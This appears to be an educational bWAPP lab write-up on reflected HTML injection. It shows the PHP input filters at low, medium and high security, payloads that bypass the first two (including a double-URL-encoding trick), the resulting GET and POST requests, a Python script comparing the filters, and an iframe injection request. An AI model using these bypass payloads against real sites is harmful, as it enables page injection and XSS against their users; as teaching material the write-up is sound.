bWAPP

Injection

Cross Site Scripting (XSS)


  • Stored XSS
  • Reflective XSS
  • DOM-based XSS
  • Server XSS
  • Client XSS

htmli_get.php / htmli_post.php - Reflective XSS using the HTTP GET and HTTP POST methods

Security Level Low

// Input Validation
// Low level: the data is returned untouched, so no character is escaped
function no_check($data) {
    return $data;
}

Attack

Because there is no input validation in place, injection is trivial. E.g., if we enter the following values:

firstname: <a href="http://www.google.com"><h1>Click Me</h1></a>
lastname : Security Level: Low

the resulting HTTP-Request (GET Method) is:

GET /bWAPP/htmli_get.php?firstname=<a+href%3D"http%3A%2F%2Fwww.google.com"><h1>Click+Me<%2Fh1><%2Fa>&lastname=Security+Level%3A+Low&form=submit HTTP/1.0

the resulting HTTP-Request (POST Method) is:

POST /bWAPP/htmli_post.php HTTP/1.0
Content-Length: 138
Content-Type: application/x-www-form-urlencoded

firstname=%3Ca+href%3D%22http%3A%2F%2Fwww.google.com%22%3E%3Ch1%3EClick+Me%3C%2Fh1%3E%3C%2Fa%3E&lastname=Security+Level%3A+Low&form=submit

  • Security Level Low: no_check($data)
    • vulnerable: no input validation

Injection Result - Low Security

Security Level Medium

// Input Validation
function xss_check_1($data) {
    // Converts only "<" and ">" to HTML entities
    $input = str_replace("<", "&lt;", $data);
    $input = str_replace(">", "&gt;", $input);
    
    // Failure is an option
    // Bypasses double encoding attacks   
    // <script>alert(0)</script>
    // %3Cscript%3Ealert%280%29%3C%2Fscript%3E
    // %253Cscript%253Ealert%25280%2529%253C%252Fscript%253E
    $input = urldecode($input);
    
    return $input;
}

Attack

The input validation does not protect against double URL-encoded input data, because urldecode() runs after the "<" and ">" replacement and so restores angle brackets that were still encoded at replacement time. E.g., if we enter the following values:

firstname: %3Ca+href="http://www.google.com"%3E%3Ch1%3EClick+Me%3C/h1%3E%3C/a%3E
lastname : Security Level: Medium

the resulting HTTP-Request (GET Method) is:

GET /bWAPP/htmli_get.php?firstname=%253Ca%2Bhref%3D"http%3A%2F%2Fwww.google.com"%253E%253Ch1%253EClick%2BMe%253C%2Fh1%253E%253C%2Fa%253E&lastname=Security+Level%3A+Medium&form=submit HTTP/1.0

the resulting HTTP-Request (POST Method) is:

POST /bWAPP/htmli_post.php HTTP/1.0
Content-Length: 161
Content-Type: application/x-www-form-urlencoded

firstname=%253Ca%2Bhref%3D%22http%3A%2F%2Fwww.google.com%22%253E%253Ch1%253EClick%2BMe%253C%2Fh1%253E%253C%2Fa%253E&lastname=Security+Level%3A+Medium&form=submit

  • Security Level Medium: xss_check_1($data)
    • vulnerable: insufficient input validation
    • uses urldecode() on data that PHP has already URL-decoded once ($_GET / $_POST), thus allowing double URL-encoded data through

Injection Result - Medium Security

Security Level High

// Input Validation
function xss_check_3($data, $encoding = "UTF-8") {
    // htmlspecialchars - converts special characters to HTML entities    
    // '&' (ampersand) becomes '&amp;' 
    // '"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set
    // "'" (single quote) becomes '&#039;' (or &apos;) only when ENT_QUOTES is set
    // '<' (less than) becomes '&lt;'
    // '>' (greater than) becomes '&gt;'  
    
    return htmlspecialchars($data, ENT_QUOTES, $encoding);
}

Attack

At the moment, there is no known way to circumvent this input validation, as long as the escaped value is rendered in a context where HTML entity encoding is the correct defence (HTML body text or a quoted attribute value).

  • Security Level High: xss_check_3($data)
    • no known vulnerability if used in the right context
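To make the difference between the three levels concrete, the following Python script (an added example, not bWAPP's own code) re-implements the three PHP filters with their standard-library equivalents and runs the two payloads shown above through each of them. The only check it performs is whether raw angle brackets survive, which is exactly what lets the injected markup render. The function names mirror the PHP ones; `xss_check_1_fixed` is a hypothetical corrected ordering added here to show that the medium-level defect is the order of decode and escape, not the choice of characters alone. `unquote_plus` stands in for PHP's urldecode() (both turn "+" into a space), and `html.escape(..., quote=True)` for htmlspecialchars() with ENT_QUOTES (Python emits `&#x27;` rather than `&#039;` for the single quote, which is equivalent for this purpose).

```python
import html
from urllib.parse import unquote_plus

# Constructed sample inputs, taken from the write-up above. They are the values
# as the PHP script sees them, i.e. after PHP has URL-decoded $_GET/$_POST once.
LOW_PAYLOAD = '<a href="http://www.google.com"><h1>Click Me</h1></a>'
MEDIUM_PAYLOAD = '%3Ca+href="http://www.google.com"%3E%3Ch1%3EClick+Me%3C/h1%3E%3C/a%3E'


def no_check(data: str) -> str:
    """Security level low: input is returned unchanged."""
    return data


def xss_check_1(data: str) -> str:
    """Security level medium: escape '<' and '>' first, then URL-decode.

    Because decoding runs AFTER escaping, any %3C / %3E sequence that was still
    encoded at replacement time is turned back into a raw angle bracket.
    """
    out = data.replace("<", "&lt;").replace(">", "&gt;")
    return unquote_plus(out)  # same '+' -> ' ' behaviour as PHP urldecode()


def xss_check_3(data: str) -> str:
    """Security level high: htmlspecialchars($data, ENT_QUOTES, 'UTF-8')."""
    return html.escape(data, quote=True)


def xss_check_1_fixed(data: str) -> str:
    """Hypothetical corrected medium filter (not bWAPP code).

    If a second decode is needed at all, it must happen BEFORE escaping, and the
    escape step must cover the full htmlspecialchars set, not just '<' and '>'.
    """
    return html.escape(unquote_plus(data), quote=True)


def contains_raw_markup(rendered: str) -> bool:
    """True when the value that would reach the HTML page still has raw '<' or '>'."""
    return "<" in rendered or ">" in rendered


FILTERS = {
    "low": no_check,
    "medium": xss_check_1,
    "high": xss_check_3,
    "medium_fixed": xss_check_1_fixed,
}


def evaluate(payload: str) -> dict:
    """Run one payload through every filter; map level -> raw markup survives?"""
    return {level: contains_raw_markup(fn(payload)) for level, fn in FILTERS.items()}


if __name__ == "__main__":
    for name, payload in (("single-encoded", LOW_PAYLOAD), ("double-encoded", MEDIUM_PAYLOAD)):
        print(f"{name}: {evaluate(payload)}")
```

Running the script shows that the medium filter stops the single-encoded payload but lets the double-encoded one through, while the high filter and the reordered fixed filter leave no raw markup for either input. In a review, the signal to look for is any decode step (urldecode, base64, JSON parse) placed after an escaping step: escaping must be the last transformation before output.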

iframei.php - iFrame Injection

Security Level Low

GET /bWAPP/iframei.php?ParamUrl=https://www.bing.com&ParamWidth=250&ParamHeight=250 HTTP/1.0